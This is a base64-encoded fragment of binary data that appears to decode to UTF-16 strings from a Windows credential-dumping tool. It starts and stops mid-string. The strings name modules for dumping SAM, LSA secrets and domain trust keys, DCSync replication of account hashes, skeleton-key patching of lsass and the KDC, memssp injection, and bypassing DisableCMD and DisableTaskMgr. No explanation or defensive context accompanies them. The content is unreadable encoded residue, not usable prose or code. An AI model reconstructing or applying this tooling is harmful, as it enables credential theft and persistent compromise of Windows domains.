bABzAGEAXwB1AHMAZQByACAAOwAgAFMAYQBtAFEAdQBlAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AVQBzAGUAcgAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBVAHMAZQByACAAJQAwADgAeAAKAAAAAAAAAFAAcgBpAG0AYQByAHkAAABDAEwARQBBAFIAVABFAFgAVAAAAAAAAABXAEQAaQBnAGUAcwB0AAAASwBlAHIAYgBlAHIAbwBzAAAAAAAAAAAASwBlAHIAYgBlAHIAbwBzAC0ATgBlAHcAZQByAC0ASwBlAHkAcwAAAE4AVABMAE0ALQBTAHQAcgBvAG4AZwAtAE4AVABPAFcARgAAAAAAAAAgACAAIAAgAEwATQAgACAAIAA6ACAAAAAKACAAIAAgACAATgBUAEwATQAgADoAIAAAAAAAAAAAACAAIAAgACAAJQAuACoAcwAKAAAAAAAAACAAIAAgACAAJQAwADIAdQAgACAAAAAAACAAIAAgACAARABlAGYAYQB1AGwAdAAgAFMAYQBsAHQAIAA6ACAAJQAuACoAcwAKAAAAAAAAAAAAQwByAGUAZABlAG4AdABpAGEAbABzAAAATwBsAGQAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAgACAAIAAgAEQAZQBmAGEAdQBsAHQAIABTAGEAbAB0ACAAOgAgACUALgAqAHMACgAgACAAIAAgAEQAZQBmAGEAdQBsAHQAIABJAHQAZQByAGEAdABpAG8AbgBzACAAOgAgACUAdQAKAAAAAAAAAAAAUwBlAHIAdgBpAGMAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAE8AbABkAGUAcgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAAAAAAAgACAAIAAgAFIAYQBuAGQAbwBtACAAVgBhAGwAdQBlACAAOgAgAAAAIAAgACAAIAAgACAAJQBzACAAOgAgAAAAIAAgACAAIAAgACAAJQBzACAAKAAlAHUAKQAgADoAIAAAAAAAAAAAAE4ATwBOAEUAIAAgACAAAABOAFQANABPAFcARgAgAAAAQwBMAEUA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bABzAGEAZAB1AG0AcABfAEwAcwBhAFIAZQB0AHIAaQBlAHYAZQBQAHIAaQB2AGEAdABlAEQAYQB0AGEAOgAgADAAeAAlADAAOAB4AAoAAAAAAAoAQwBvAG0AcABhAHQAaQBiAGkAbABpAHQAeQAgAHAAcgBlAGYAZQByAGUAZAAgAGsAZQB5ADoAIAAAAAAAAABHACQAQgBDAEsAVQBQAEsARQBZAF8AUAAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcgBwAGQAYQB0AGEAIAA7ACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8ATABzAGEAUgBlAHQAcgBpAGUAdgBlAFAAcgBpAHYAYQB0AGUARABhAHQAYQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAGsAZABjAAAAWwBEAEMAXQAgAE8AYgBqAGUAYwB0ACAAdwBpAHQAaAAgAEcAVQBJAEQAIAAnACUAcwAnAAoAAABbAEQAQwBdACAAJwAlAHMAJwAgAHcAaQBsAGwAIABiAGUAIAB0AGgAZQAgAHUAcwBlAHIAIABhAGMAYwBvAHUAbgB0AAoAAABsAGQAYQBwAAAAAAAAAAAAbgBjAGEAYwBuAF8AaQBwAF8AdABjAHAAAAAAAAAAAAAAAAAAAAAAAFsARABDAF0AIABtAHMALQBEAFMALQBSAGUAcABsAGkAYwBhAHQAaQBvAG4ARQBwAG8AYwBoACAAaQBzADoAIAAlAHUACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAARABSAFMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMALAAgAGkAbgB2AGEAbABpAGQAIABkAHcATwB1AHQAVgBlAHIAcwBpAG8AbgAgACgAJQB1ACkAIABhAG4AZAAvAG8AcgAgAGMATgB1AG0ATwBiAGoAZQBjAHQAcwAgACgAJQB1ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGQAYwBzAHkAbgBjACAAOwAgAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBkAGMAcwB5AG4AYwAgADsAIABNAGkAcwBzAGkAbgBnACAAdQBzAGUAcgAgAG8AcgAgAGcAdQBpAGQAIABhAHIAZwB1AG0AZQBuAHQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGQAYwBzAHkAbgBjACAAOwAgAEQAbwBtAGEAaQBuACAAQwBvAG4AdAByAG8AbABsAGUAcgAgAG4AbwB0ACAAcAByAGUAcwBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAIAA7ACAARABvAG0AYQBpAG4AIABuAG8AdAAgAHAAcgBlAHMAZQBuAHQALAAgAG8AcgAgAGQAbwBlAHMAbgAnAHQAIABsAG8AbwBrACAAbABpAGsAZQAgAGEAIABGAFEARABOAAoAAAAAACUAcwAlAC4AKgBzACUAcwAAAAAAAAAAACAAIAAgACAAJQBzAC0AJQAyAHUAOgAgAAAAAAAAAAAAIAAgAEgAYQBzAGgAIAAlAHMAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZABjAHMAeQBuAGMAXwBkAGUAYwByAHkAcAB0ACAAOwAgAFIA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cgAgAFAAcgBpAG4AYwBpAHAAYQBsACAATgBhAG0AZQAgACAAOgAgAAAAQQBjAGMAbwB1AG4AdAAgAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAoACAAJQBzACAAKQAKAAAAVQBzAGUAcgAgAEEAYwBjAG8AdQBuAHQAIABDAG8AbgB0AHIAbwBsACAAOgAgACUAMAA4AHgAIAAoACAAAAAAAEEAYwBjAG8AdQBuAHQAIABlAHgAcABpAHIAYQB0AGkAbwBuACAAIAAgADoAIAAAAFAAYQBzAHMAdwBvAHIAZAAgAGwAYQBzAHQAIABjAGgAYQBuAGcAZQAgADoAIAAAAE8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5ACAASQBEACAAIAAgADoAIAAAAE8AYgBqAGUAYwB0ACAAUgBlAGwAYQB0AGkAdgBlACAASQBEACAAIAAgADoAIAAlAHUACgAAAAAACgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOgAKAAAAAABsAG0AIAAgAAAAAAAAAAAACgBTAHUAcABwAGwAZQBtAGUAbgB0AGEAbAAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA6AAoAAAAqACAAJQB3AFoAIAAqAAoAAAAAACUwMngAAAAAAAAAACAAIAAgACAAVQBuAGsAbgBvAHcAbgAgAGQAYQB0AGEAIAA6ACAAAAAqACoAIABUAFIAVQBTAFQARQBEACAARABPAE0AQQBJAE4AIAAtACAAQQBuAHQAaQBzAG8AYwBpAGEAbAAgACoAKgAKAAoAAABQAGEAcgB0AG4AZQByACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoACgAAAGEAYwBjAG8AdQBuAHQAAABjAG8AbQBwAHUAdABlAHIAAAAAAAAAAAAgACAAQQBjAGMAbwB1AG4AdAA6ACAAJQBzAAoAAAAAACAAIABOAFQATABNACAAIAAgADoAIAAAACAAIABOAFQATABNAC0AMQAgADoAIAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABJAF8ATgBlAHQAUwBlAHIAdgBlAHIAVAByAHUAcwB0AFAAYQBzAHMAdwBvAHIAZABzAEcAZQB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABTAGUAcgB2AGUAcgBDAHIAZQBkAGUAbgB0AGkAYQBsACAAZABvAGUAcwAgAG4AbwB0ACAAbQBhAHQAYwBoACAAQwBhAG4AZABpAGQAYQB0AGUAUwBlAHIAdgBlAHIAQwByAGUAZABlAG4AdABpAGEAbAAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABJAF8ATgBlAHQAUwBlAHIAdgBlAHIAQQB1AHQAaABlAG4AdABpAGMAYQB0AGUAMgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABJAF8ATgBlAHQAUwBlAHIAdgBlAHIAUgBlAHEAQwBoAGEAbABsAGUAbgBnAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABuAHQAbABtACAAaABhAHMAaAAvAHIAYwA0ACAAawBlAHkAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAzADIAIAAoADEANgAgAGIAeQB0AGUAcwApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAG4AZQB0AHMAeQBuAGMAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdAAgADoAIABuAHQAbABtAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBuAGUAdABzAHkAbgBjACAAOwAgAE0AaQBzAHMAaQBuAGcAIABhAHIAZwB1AG0AZQBuAHQAIAA6ACAAdQBzAGUAcgAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABNAGkAcwBzAGkAbgBnACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAGQAYwAKAAAAAAAAAGMAbQBkAAAAAAAAAAAAAABDAG8AbQBtAGEAbgBkACAAUAByAG8AbQBwAHQAIAAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAEMATQBEACkAAAAAAAAAAAByAGUAZwBlAGQAaQB0AAAAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIAAgACAAIAAgACAAIAAgACAAKAB3AGkAdABoAG8AdQB0ACAARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACkAAAAAAHQAYQBzAGsAbQBnAHIAAABUAGEAcwBrACAATQBhAG4AYQBnAGUAcgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAKQAAAAAAAAAAAG4AYwByAG8AdQB0AGUAbQBvAG4AAAAAAEoAdQBuAGkAcABlAHIAIABOAGUAdAB3AG8AcgBrACAAQwBvAG4AbgBlAGMAdAAgACgAdwBpAHQAaABvAHUAdAAgAHIAbwB1AHQAZQAgAG0AbwBuAGkAdABvAHIAaQBuAGcAKQAAAAAAZABlAHQAbwB1AHIAcwAAAAAAAAAAAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAVAByAHkAIAB0AG8AIABlAG4AdQBtAGUAcgBhAHQAZQAgAGEAbABsACAAbQBvAGQAdQBsAGUAcwAgAHcAaQB0AGgAIABEAGUAdABvAHUAcgBzAC0AbABpAGsAZQAgAGgAbwBvAGsAcwAAAG0AZQBtAHMAcwBwAAAAAABzAGsAZQBsAGUAdABvAG4AAAAAAAAAAABjAG8AbQBwAHIAZQBzAHMAbQBlAAAAAABtAGkAcwBjAAAAAAAAAAAATQBpAHMAYwBlAGwAbABhAG4AZQBvAHUAcwAgAG0AbwBkAHUAbABlAAAAAAAAAAAASwBpAHcAaQBBAG4AZABDAE0ARAAAAAAARABpAHMAYQBiAGwAZQBDAE0ARAAAAAAAYwBtAGQALgBlAHgAZQAAAEsAaQB3AGkAQQBuAGQAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAAAAAAAEQAaQBzAGEAYgBsAGUAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAAAAAAAHIAZQBnAGUAZABpAHQALgBlAHgAZQAAAEsAaQB3AGkAQQBuAGQAVABhAHMAawBNAGcAcgAAAAAARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByAAAAAAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAAABkAHMATgBjAFMAZQByAHYAaQBjAGUAAAAJACgAJQB3AFoAKQAAAAAACQBbACUAdQBdACAAJQB3AFoAIAAhACAAAAAAAAAAAAAlAC0AMwAyAFMAAAAAAAAAIwAgACUAdQAAAAAAAAAAAAkAIAAlAHAAIAAtAD4AIAAlAHAAAAAAACUAdwBaACAAKAAlAHUAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGQAZQB0AG8AdQByAHMAXwBjAGEAbABsAGIAYQBjAGsAXwBwAHIAbwBjAGUAcwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAFAAYQB0AGMAaAAgAE8ASwAgAGYAbwByACAAJwAlAHMAJwAgAGYAcgBvAG0AIAAnACUAcwAnACAAdABvACAAJwAlAHMAJwAgAEAAIAAlAHAACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGcAZQBuAGUAcgBpAGMAXwBuAG8AZwBwAG8AXwBwAGEAdABjAGgAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAbQBzAHYAYwByAHQALgBkAGwAbAAAAAAAZm9wZW4AAABmd3ByaW50ZgAAAABmY2xvc2UAAAAAAABsAHMAYQBzAHMALgBlAHgAZQAAAAAAAABtAHMAdgAxAF8AMAAuAGQAbABsAAAAAABJAG4AagBlAGMAdABlAGQAIAA9ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAVAByAGEAbQBwAG8AbABpAG4AZQAgAG4AMAAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAVAByAGEAbQBwAG8AbABpAG4AZQAgAG4AMQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAcgBlAGEAbAAgAGEAcwBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBtAGUAbQBzAHMAcAAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAUAByAG8AYwBlAHMAcwBJAGQARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAATG9jYWxBbGxvYwAAAAAAAGwAZQB0AGEAZQBzAAAAAABrAGQAYwBzAHYAYwAuAGQAbABsAAAAAABbAEsARABDAF0AIABkAGEAdABhAAoAAABbAEsARABDAF0AIABzAHQAcgB1AGMAdAAKAAAAAAAAAFsASwBEAEMAXQAgAGsAZQB5AHMAIABwAGEAdABjAGgAIABPAEsACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABTAGUAYwBvAG4AZAAgAHAAYQB0AHQAZQByAG4AIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAARgBpAHIAcwB0ACAAcABhAHQAdABlAHIAbgAgAG4AbwB0ACAAZgBvAHUAbgBkAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAGMAcgB5AHAAdABkAGwAbAAuAGQAbABsAAAAAAAAAAAAWwBSAEMANABdACAAZgB1AG4AYwB0AGkAbwBuAHMACgAAAAAAAAAAAFsAUgBDADQAXQAgAGkAbgBpAHQAIABwAGEAdABjAGgAIABPAEsACgAAAAAAAAAAAFsAUgBDADQAXQAgAGQAZQBjAHIAeQBwAHQAIABwAGEAdABjAGgAIABPAEsACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGMAcgBlAGEAdABlACAAcgBlAG0AbwB0AGUAIABmAHUAbgBjAHQAaQBvAG4AcwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4